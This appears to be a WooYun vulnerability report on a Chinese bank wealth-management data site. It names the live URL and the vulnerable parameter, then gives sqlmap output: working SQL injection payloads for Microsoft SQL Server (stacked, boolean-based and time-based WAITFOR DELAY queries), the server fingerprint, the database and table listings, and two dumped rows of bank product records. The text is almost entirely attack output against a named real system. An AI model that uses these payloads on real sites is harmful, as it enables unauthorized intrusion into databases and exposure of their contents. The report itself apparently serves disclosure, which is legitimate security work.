WooYun.org

漏洞细节：
http://bankdata.jnlc.com/SitePages/productinfo.aspx?iFinancID=303346&iBankID=400057&lcqx=1-3%E6%9C%88
---
Place: GET
Parameter: iFinancID
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
Payload: iFinancID=303346'; IF(5751=5751) SELECT 5751 ELSE DROP FUNCTION QpAm--&iBankID=400057&lcqx=1-3%E6%9C%88
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: iFinancID=303346'; WAITFOR DELAY '0:0:5'--&iBankID=400057&lcqx=1-3%E6%9C%88
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: iFinancID=303346' WAITFOR DELAY '0:0:5'--&iBankID=400057&lcqx=1-3%E6%9C%88
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
available databases [6]:
[*] finchina
[*] master
[*] model
[*] msdb
[*] tempdb
[*] YHLC
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: YHLC
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.tbBankFinacle | 290717 |
| dbo.v_BankFinacle | 290717 |
| dbo.v_BankFinacleSingleInf | 290717 |
| dbo.v_GetBankFinacleAllProducts | 290716 |
| dbo.v_GetBankFinacleByBankLCQX | 290716 |
| dbo.v_GetWeekAVGSyl_ByBankID | 56391 |
| dbo.v_GetAllLcqxWeekAVGSyl_ByBankID | 26526 |
| dbo.v_GetMonthAVGSyl_ByBankID | 20411 |
| dbo.v_GetQuarterAVGSyl_ByBankID | 8923 |
| dbo.v_GetAllLcqxMonthAVGSyl_ByBankID | 8058 |
| dbo.TradingDays | 5987 |
| dbo.v_GetWeekAVGSyl_ByProfitType | 4720 |
| dbo.v_GetAllLcqxQuarterAVGSyl_ByBankID | 3104 |
| dbo.tbAgencyOrgan | 3068 |
| dbo.tbConfig | 2764 |
| dbo.YHLC_tbjnlcIndex | 2649 |
| dbo.v_GetWeekAVGSyl_AllBanks | 1704 |
| dbo.v_GetMonthAVGSyl_ByProfitType | 1317 |
| dbo.v_GetAllLcqxWeekAVGSyl_ByProfitType | 1113 |
| dbo.v_GetQuarterAVGSyl_ByProfitType | 499 |
| dbo.v_GetMonthAVGSyl_AllBanks | 439 |
| dbo.v_GetAllLcqxWeekAVGSyl_AllBanks | 316 |
| dbo.v_GetAllLcqxMonthAVGSyl_ByProfitType | 270 |
| dbo.v_GetBankFinacleHomepage | 212 |
| dbo.v_GetQuarterAVGSyl_AllBanks | 155 |
| dbo.v_GetAllLcqxQuarterAVGSyl_ByProfitType | 97 |
| dbo.v_GetAllLcqxMonthAVGSyl_AllBanks | 78 |
| dbo.v_GetAllLcqxQuarterAVGSyl_AllBanks | 30 |
| dbo.BankVip | 25 |
| dbo.YHLC_tbAgencyForVip | 22 |
| dbo.YHLC_BankFinacleRateByPeriod | 20 |
| dbo.YHLC_tbAgencyForIndex | 20 |
| dbo.v_GetWeekTotalCirculation_Homepage | 12 |
| dbo.YHLC_BankFinacleRateByPeriodFindProduct_TEMP | 10 |
| dbo.MSreplication_objects | 9 |
| dbo.BankTypeOrder | 7 |
| dbo.MSreplication_subscriptions | 1 |
| dbo.MSsubscription_agents | 1 |
| dbo.MSsubscription_properties | 1 |
+--------------------------------------------------+---------+
Database: YHLC
Table: tbBankFinacle
[2 entries]
+---------+-----------+------------+-------------+--------+--------+-------+----------+-------+-------+--------+---------+---------+----------+----------+----------+----------+----------+--------------------+-----------+------------+------------+--------------------+------------+-----------------------------------------------------------------------+--------------------+------------+-------------+-------------+-------------+-------------+-------------+---------------------------------+--------------+--------------+--------------+--------------+--------------+--------------------+--------------------+----------------------------------------------------------------------+---------------+----------------------------------------+---------------+---------------+---------------+---------------+----------------+------------------+----------------+----------------+----------------+----------------+-----------------+---------------------------------------------------+------------------+------------------+
| iBankID | iFinancID | strFileIDs | iFinancIDCH | dTgfl | dGlfy | dShfl | dBbbl | dFljx | dRgfl | dFdsyl | dCyqsyl | strMemo | strLimit | strYield | iRunDays | dDqnhsyl | strRella | sdtUpdate | strSaleTo | dYqnhsylsx | dMarketBot | sdtSaleEnd | dMarketTop | strFeeExpl | sdtFinaEnd | strCejwglf | sdtUpdateCH | sdtCreateCH | strSeriName | strNameFrom | strFinaType | strFinaName | strMoneyType | mInvestStart | strSaleWhere | strFinaStyle | strReferRate | sdtSaleStart | sdtFinaStart | strFundsExpl | strFinaCodeWD | strFinaNameWD | strFinaCodeCH | strFinaNameCH | strFinaNamePY | strProfitType | sdtFirstUpdate | strFundsInvest | strFinaNameQT2 | strFinaNameQT1 | strEarlierStop | strBankNameSmp | strBusinesStyle | strEarlStopExpl | strBankStopRight | strEarlBackRight |
+---------+-----------+------------+-------------+--------+--------+-------+----------+-------+-------+--------+---------+---------+----------+----------+----------+----------+----------+--------------------+-----------+------------+------------+--------------------+------------+-----------------------------------------------------------------------+--------------------+------------+-------------+-------------+-------------+-------------+-------------+---------------------------------+--------------+--------------+--------------+--------------+--------------+--------------------+--------------------+----------------------------------------------------------------------+---------------+----------------------------------------+---------------+---------------+---------------+---------------+----------------+------------------+----------------+----------------+----------------+----------------+-----------------+---------------------------------------------------+------------------+------------------+
| 600659 | 100 | NULL | NULL | 0.0400 | 0.1500 | NULL | 103.2150 | NULL | NULL | 3.2150 | NULL | NULL | 1月 | NULL | 31 | 3.2150 | NULL | 06 7 2012 2:19PM | VIP | 3.2150 | 0.8000 | 01 9 2011 12:00AM | 0.8000 | 1.年托管费率0.035% 2.年管理费率0.15% 3.投资组合运作年化收益率超过3.40%的部分作为浮动资产投资管理费由上海银行收取. | 02 10 2011 12:00AM | 是 | NULL | NULL | NULL | NULL | 非结构性产品 | 慧财110M101期点滴成金人民币1个月W20110M101B | 人民币 | 50000.00 | 全国 | 单期 | NULL | 01 4 2011 12:00AM | 01 10 2011 12:00AM | 1.委托起始金额(元):50000,委托递增单位(元):10000,单户最高限额9000万元. 2.发行限额:个人VIP客户8000万元 | NULL | 2011年“慧财”110M101期点滴成金人民币1个月W20110M101B | NULL | NULL | NULL | 保证收益型 | NULL | 债券 | NULL | NULL | NULL | 上海银行 | 其他 | 上海银行可单方面全部提前兑付本理财产品; 本理财产品投资者不得提前部分支取或全额赎回,也不可质押. | 是 | 否 |
| 600157 | 1000 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 21天 | NULL | 21 | 3.4500 | NULL | 05 8 2012 5:00PM | 机构 | 3.4500 | NULL | 01 25 2011 12:00AM | NULL | NULL | 02 16 2011 12:00AM | NULL | NULL | NULL | NULL | NULL | 非结构性产品 | 第076期非凡资产管理(增利型)理财产品D21款产品 | 人民币 | 500000.00 | 全国 | 单期 | NULL | 01 20 2011 12:00AM | 01 26 2011 12:00AM | 对公:委托起始金额(元):500000 | NULL | 2011年第076期非凡资产管理(增利型)理财产品D21款产品 | NULL | NULL | NULL | 非保本浮动收益型 | NULL | 债券,信贷资产,利率,其他,票据 | NULL | NULL | NULL | 民生银行 | 其他,信托 | NULL | NULL | NULL |
+---------+-----------+------------+-------------+--------+--------+-------+----------+-------+-------+--------+---------+---------+----------+----------+----------+----------+----------+--------------------+-----------+------------+------------+--------------------+------------+-----------------------------------------------------------------------+--------------------+------------+-------------+-------------+-------------+-------------+-------------+---------------------------------+--------------+--------------+--------------+--------------+--------------+--------------------+--------------------+----------------------------------------------------------------------+---------------+----------------------------------------+---------------+---------------+---------------+---------------+----------------+------------------+----------------+----------------+----------------+----------------+-----------------+---------------------------------------------------+------------------+------------------+